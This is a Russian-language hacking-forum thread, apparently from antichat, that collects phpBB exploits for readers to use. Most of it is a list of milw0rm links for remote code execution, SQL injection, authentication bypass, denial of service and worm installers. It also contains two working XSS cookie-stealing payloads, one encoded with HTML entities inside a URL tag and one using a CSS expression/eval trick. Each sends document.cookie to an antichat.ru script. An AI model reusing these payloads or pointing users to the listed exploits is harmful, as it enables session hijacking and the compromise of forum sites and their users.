Так как помимо ipb, много вопросов есть и по phpbb форумам, я решил с позволения модеров создать эту тему, на которую можно будет ссылаться а не послать в поиск. Здесь я размещу всякие эксплойты и т.д. =)
Будут выкладываться эксплойты для всех версий.

Вроде бы почти такая же тема уже есть и тоже в твоем исполнении=)))
http://forum.antichat.ru/thread10398-phpbb.html

phpBB 2.0.13 (admin_styles.php) Remote Command Execution Exploit (http://milw0rm.com/id.php?id=1247)
phpBB 2.0.15 Remote PHP Code Execution Exploit (metasploit) (http://milw0rm.com/id.php?id=1113)
phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber) (http://milw0rm.com/id.php?id=1103)
phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (http://milw0rm.com/id.php?id=1095)
phpBB 2.0.15 (highlight) Database Authentication Details Exploit (http://milw0rm.com/id.php?id=1080)
phpBB 2.0.15 (highlight) Remote PHP Code Execution (http://milw0rm.com/id.php?id=1076)
phpBB <= 2.0.15 Register Multiple Users Denial of Service (perl code) (http://milw0rm.com/id.php?id=1063)
phpBB <= 2.0.15 Register Multiple Users Denial of Service (c code) (http://milw0rm.com/id.php?id=1064)
phpBB <= 2.0.13 'Calendar Pro' mod Remote Exploit (http://milw0rm.com/id.php?id=910)
phpBB <= 2.0.13 'downloads.php' mod Remote Exploit (http://milw0rm.com/id.php?id=907)
phpBB <= 2.0.12 Change User Rights Authentication Bypass (c code) (http://milw0rm.com/id.php?id=897)
phpBB <= 2.0.12 Change User Rights Authentication Bypass (http://milw0rm.com/id.php?id=889)
phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial 2) (http://milw0rm.com/id.php?id=871)
phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial) (http://milw0rm.com/id.php?id=858)
phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm) (http://milw0rm.com/id.php?id=740)
Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search) (http://milw0rm.com/id.php?id=720)
phpBB highlight Arbitrary File Upload (Santy.A) (http://milw0rm.com/id.php?id=702)
PHP <= 4.3.9 & phpBB 2.x with unserialize() Remote Exploit (compiled) (http://milw0rm.com/id.php?id=697)
phpBB v1.0.0 - 2.0.10 admin_cash.php remote exploit (http://milw0rm.com/id.php?id=676)
phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version) (http://milw0rm.com/id.php?id=673)
phpBB <= 2.0.10 Remote Command Execution Exploit (http://milw0rm.com/id.php?id=647)
phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit (http://milw0rm.com/id.php?id=137)
phpBB 2.0.4 Remote php File Include Exploit (http://milw0rm.com/id.php?id=47)
phpBB 2.0.5 SQL Injection password disclosure Exploit (http://milw0rm.com/id.php?id=44)

phpBB 2.0.18http://www.wj (http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;)

2005-10-11 phpBB 2.0.13 (admin_styles.php) Remote (http://www.milw0rm.com/id.php?id=1247)
Command Execution Exploit 6680 R D RusH (http://www.milw0rm.com/id.php?id=1247)
2005-07-19 phpBB 2.0.15 Remote PHP Code Execution (http://www.milw0rm.com/id.php?id=1113)
Exploit (metasploit) 10311 R M D str0ke (http://www.milw0rm.com/id.php?id=1113)
2005-07-13 phpBB <= 2.0.16 XSS Remote Cookie (http://www.milw0rm.com/id.php?id=1103)
Disclosure Exploit (cookie grabber) 5813 R D suBzero (http://www.milw0rm.com/id.php?id=1103)
2005-07-08 phpBB <= 2.0.16 XSS Remote Cookie (http://www.milw0rm.com/id.php?id=1095)
Disclosure Exploit 10273 R D D|ablo 2005-07-03 phpBB 2.0.15 (highlight) Database (http://www.milw0rm.com/id.php?id=1095)
Authentication Details Exploit 11755 R M D SecureD (http://www.milw0rm.com/id.php?id=1080)
2005-06-29 phpBB 2.0.15 (highlight) Remote PHP (http://www.milw0rm.com/id.php?id=1076)
Code Execution 7951 R M D rattle (http://www.milw0rm.com/id.php?id=1076)
2005-06-22 phpBB <= 2.0.15 Register Multiple (http://www.milw0rm.com/id.php?id=1063)
Users Denial of Service (perl code) 4187 R D g30rg3_x (http://www.milw0rm.com/id.php?id=1063)
2005-06-22 phpBB <= 2.0.15 Register Multiple (http://www.milw0rm.com/id.php?id=1064)
Users Denial of Service (c code) 2684 R D HaCkZaTaN (http://www.milw0rm.com/id.php?id=1064)
2005-04-04 phpBB <= 2.0.13 'Calendar Pro' mod (http://www.milw0rm.com/id.php?id=910)
Remote Exploit 3803 R D CereBrums (http://www.milw0rm.com/id.php?id=910)
2005-04-02 phpBB <= 2.0.13 'downloads.php' mod (http://www.milw0rm.com/id.php?id=907)
Remote Exploit 6635 R D CereBrums (http://www.milw0rm.com/id.php?id=907)
2005-03-24 phpBB <= 2.0.12 Change User Rights (http://www.milw0rm.com/id.php?id=897)
Authentication Bypass (c code) 4670 R D str0ke (http://www.milw0rm.com/id.php?id=897)
2005-03-21 phpBB <= 2.0.12 Change User Rights (http://www.milw0rm.com/id.php?id=889)
Authentication Bypass 7392 R D Kutas (http://www.milw0rm.com/id.php?id=889)
2005-03-11 phpBB <= 2.0.12 Session Handling (http://www.milw0rm.com/id.php?id=871)
Authentication Bypass (tutorial 2) 8675 R D Ali7 (http://www.milw0rm.com/id.php?id=871)
2005-03-05 phpBB <= 2.0.12 Session Handling (http://www.milw0rm.com/id.php?id=858)
Authentication Bypass (tutorial) 4825 R D PPC (http://www.milw0rm.com/id.php?id=858)
2005-01-04 phpBB <= 2.0.10 Bot Install (Altavista) (http://www.milw0rm.com/id.php?id=740)
(ssh.D.Worm) 2436 R D Severino Honorato (http://www.milw0rm.com/id.php?id=740)
2004-12-25 Sanity.b - phpBB <= 2.0.10 Bot Install (http://www.milw0rm.com/id.php?id=720)
(AOL/Yahoo Search) 1717 R D n/a (http://www.milw0rm.com/id.php?id=720)
2004-12-22 phpBB highlight Arbitrary File Upload (http://www.milw0rm.com/id.php?id=702)
(Santy.A) 1956 R D n/a (http://www.milw0rm.com/id.php?id=702)
2004-12-17 PHP <= 4.3.9 & phpBB 2.x with (http://www.milw0rm.com/id.php?id=697)
unserialize() Remote Exploit (compiled) 2184 R D overdose (http://www.milw0rm.com/id.php?id=697)
2004-12-05 phpBB v1.0.0 - 2.0.10 admin_cash.php (http://www.milw0rm.com/id.php?id=676)
remote exploit 2279 R D evilrabbi (http://www.milw0rm.com/id.php?id=676)
2004-12-03 phpBB <= 2.0.10 Remote Command (http://www.milw0rm.com/id.php?id=673)
Execution Exploit (cgi version) 2372 R M D ZzagorR (http://www.milw0rm.com/id.php?id=673)
2004-11-22 phpBB <= 2.0.10 Remote Command (http://www.milw0rm.com/id.php?id=647)
Execution Exploit 4447 R M D RusH (http://www.milw0rm.com/id.php?id=647)
2003-12-21 phpBB 2.0.6 search_id sql injection MD5 (http://www.milw0rm.com/id.php?id=137)
Hash Remote Exploit 2482 R D RusH (http://www.milw0rm.com/id.php?id=137)
2003-06-30 phpBB 2.0.4 Remote php File Include (http://www.milw0rm.com/id.php?id=47)
Exploit 1735 R D Spoofed (http://www.milw0rm.com/id.php?id=47)
2003-06-20 phpBB 2.0.5 SQL Injection password (http://www.milw0rm.com/id.php?id=44)
disclosure Exploit 2316 R D Rick Patel (http://www.milw0rm.com/id.php?id=44)

www.ut (www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;)'

Всем вам в помощь=))

Все кто хочет помочь в создании темы, баги в личку,тему в топку.
Скоро будет созданы темы-баглисты типа этого.